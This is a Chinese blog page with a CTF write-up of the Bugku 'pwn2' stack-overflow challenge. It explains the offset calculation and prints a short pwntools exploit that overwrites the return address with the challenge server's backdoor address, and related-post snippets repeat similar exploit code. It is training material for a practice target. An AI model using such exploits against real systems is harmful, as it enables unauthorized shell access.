[pwn]bugku pwn2

最新推荐文章于 2024-08-10 02:34:02 发布

Gao's blog

最新推荐文章于 2024-08-10 02:34:02 发布

阅读量5.5k

点赞数

本文链接：https://blog.csdn.net/qq_18823653/article/details/88824173

版权

首先检查了一下保护机制，在这里插入图片描述发现几乎啥保护都没有，ida查看一下
read()函数存在溢出，然后又看了一下发现main函数下面有一个get_shell_函数，点进去看了看应该是让返回地址覆盖成getshell地址，
gdb看一下偏移rbp前四位为bAA1，算一下偏移
在这里插入图片描述
到rbp偏移为48，向上8字节是父函数rbp，所以偏移56覆盖到返回地址，get_shell_地址为
exp如下：

from pwn import *
p = remote('114.116.54.89','10003')
payload='a'*48+'a'*8+p64(0x400751)
p.recvline()
p.sendline(payload)
p.interactive()

一开始interactive()少加了括号，死活成功不了，后来问群里人发现括号忘记加了，还是练的太少

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Gao's blog

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
4
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

BugkuCTF练习平台pwn3(read_note)的writeup

只影的博客

03-05

1508

在Bugku的pwn题中，这道题分值最高，也是难度最大的一道。难点在于，第一要读懂题目找出漏洞，第二是要绕过各种保护机制，第三是exp的编写调试。看一眼程序的保护机制，发现除了RELRO所有保护全开，还是有点头疼的，毕竟我刚开始学pwn没几天，还没有做过PIE和Canary的题目，所以调试还是花了不少时间的。首先分析程序，重要部分如下所示。一开始会让你输入一个路径，不存在的话就会报错推出，然后打...

bugku中pwn2的write up

darui_csdn的博客

09-06

397

bugku中pwn2的write up**最后效果如下：** 作为一个初出茅庐的菜鸟，做几个简单的pwn题练一下，正好学一下基础知识。首先来看这道题，checksec一下，我们发现，没有打开什么保护。运行一下，看看需要在哪里插入payload。注意这里需要先赋予运行权限，笔者作为新手犯了几次错误。把程序放进IDA中看一下套路流程。我们在read函数这里可以使程序溢出。也看到ebp...

4 条评论您还未登录，请先登录后发表或查看评论

bugku pwn2

doudoudedi

06-04

1702

这道题是一道简单的栈溢出直接用IDA查看很明显的得到flag的函数直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...

BugKu CTF Misc：眼见非实 & 啊哒 & ping & Snowfall

最新发布

Flag少侠的博客

08-10

8815

BugKu是一个由乌云知识库（wooyun.org）推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全的平台，供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景，如Web漏洞、系统漏洞、密码学等，参与者需要通过解决这些漏洞来获取Flag。

Writeup bugku刷题 pwn2

Migraine‘s Blog

05-13

2367

概述：bugku新出的pwn题，练一练手关键字：栈溢出 x64 网址：https://ctf.bugku.com/challenges 分析一下代码，发现非常明显是x64下的栈溢出。 Pwntools生成shellcode >>> from pwn import * >>> context(os='linux...

BugkuCtf-pwn2-exp

weixin_30340745的博客

08-22

387

#!/usr/bin/env python from pwn import * p = process('./pwn2') payload = 'a' * 56 + p64(0x400751) p.recvuntil('?') p.sendline(payload) print p.recvall() 转载于:https://www.cnblo...

pwn2own

weixin_34367257的博客

04-04

1081

Pwn2Own是全球最著名的黑客大赛之一，由美国五角大楼入侵防护系统供应商TippingPoint的DVLabs赞助，今年已经是第六届。 1比赛规则参赛黑客们的目标是4大主流网页浏览器——IE、Firefox、Chrome和Safari，平台是在安装安全更新的Windows 7操作系统下运行，Safari浏览器将在安装苹果Mac OS X 10.6雪豹操作系统下运作，顺利攻破一个主流浏览器便...

BugkuCTF-PWN题pwn2-overflow超详细讲解

am_03的博客

08-30

2158

解题思路 1）计算出get_shell_的地址偏移量 2）算出来之后就直接溢出到后门函数知识点 x64函数调用规则解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前，比如int func(int a, int b, int c, int d, int e, int f, int g, int h)，首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9，其余参数存入到栈里，保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里，然后一次入栈h

bugku pwn题libc

11-06

bugku pwn题libc，pwn3做题时可在里面查找system、binsh等

bugku-PWN-瑞士军刀解析过程

weixin_46168073的博客

11-14

2001

一、启动场景点进去，我发现点不进去，搞了半天，花了10个币才搞明白这个不是点的，而是连接的。这里使用kali。 kali vmwar免安版本：链接：https://pan.baidu.com/s/1SvbXZlx-0h5gN5__rOp2bg 提取码：1234 二、解题过程安装kali之后，我们直接开大，然后输入nc 114.67.246.176 13340(端口有变是因为我重启了一次，这里输入，你的端口。) 然后ls，目录下有个flag目录，直接cat flag目录...

BugkuCTF-PWN题pwn7-repeater详细讲解多解法

am_03的博客

08-31

4225

知识点解题流程方法一查看文件类型： 32位文件查看保护机制只开启了NX 32位IDA打开伪码： 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。解题思路此题的大概思路如下： 1、找到libc_start_main在栈内的偏移，使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc，算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试执行gd

bugku pwn libc

09-03

bugku pwn3和pwn5用到的libc文件，原题目中没有给出libc文件，也不容易获取libc版本

[WP]BugkuCtf - pwn2

XiaoYan8023的博客

04-27

352

1.首先运行一下该程序 2.我们权限不够于是去修改一下权限（改前，改后）（当然，这步有可能是不需要的） 3.改后我们重新运行一下（123是输入的语句） 4.拖进IDA，查看字符串，此处应该就是得到flag的地方 5.之后我们查看main函数，并没有我们刚才所看见的那句话 6.而在get_shell函数中我...

bugku-pwn2-wp

weixin_45427676的博客

04-05

368

下载完题后先在VM中checksec查看保护机制基本没有开什么保护，可以知道文件是64位的，用64位IDA打开，按F5键反汇编一下，看一下main函数可以发现read()函数存在栈溢出漏洞，缓冲区s的大小为0x30，而read()函数指向缓冲区中读入0x100大小的数据，所以造成栈溢出。在main函数下面有一个get_shell_()函数，打开看一下有一个system(“cat fl...

Bugku旧平台pwn writeup

a370793934的专栏

11-28

779

Pwn1 nc 114.116.54.89 10001 连上cat flag： flag{6979d853add353c9} Pwn2 #!/usr/bin/env python3 # -*- coding:utf-8 -*- from pwn import * context.log_level='debug' p = process("./pwn2") #p = re...

bugke pwn2

weixin_33858336的博客

06-05

299

根据伪代码可以看到read函数存在溢出存在一个后面那就直接覆盖返回地址就完事了从ida很直观看出s的偏移为0x30 所以到到返回地址的距离就是0x30+0x8 from pwn import *#p = process('./pwn2')p=remote('114.116.54.89','10003')elf = ELF('./pwn2')flag = elf.symb...

我要上 Pwn2Own

smellycat000的专栏

06-24

382

挑战黑客极限:Pwn2Own 2015成史上“最难”黑客大赛

weixin_34096182的博客

03-16

366

Pwn2Own是全球最著名、奖金最丰厚的黑客大赛，由美国五角大楼入侵防护系统供应商TippingPoint赞助。近日Pwn2Own 2015公布全新的比赛规则，本届赛事难度超高、史无前例，包括VUPEN等赫赫有名的黑客团队也望而却步。 Pwn2Own以IE、Chrome、Safari、Firefox等浏览器作为主要攻击目标，参赛黑客需要发现并攻破上述软件漏洞，完全控制操作系统。 2015年...

Bugku-pwn4详解

Casuall的博客

07-14

4439

这道题来自bugku的第三道pwn题，pwn4。首先进行一些常规检查。一个64位动态链接的程序，没有开什么保护。然后用IDA打开，有个危险函数read,可以用来溢出。 shift + F12查看有没有可疑字符串，然后在字符串上按x查看引用他的地方，找到了一个system函数但是system函数里面的字符串并不是我们想要的'/bin/sh',尝试用ROPgadget去搜索，命令为ROPg...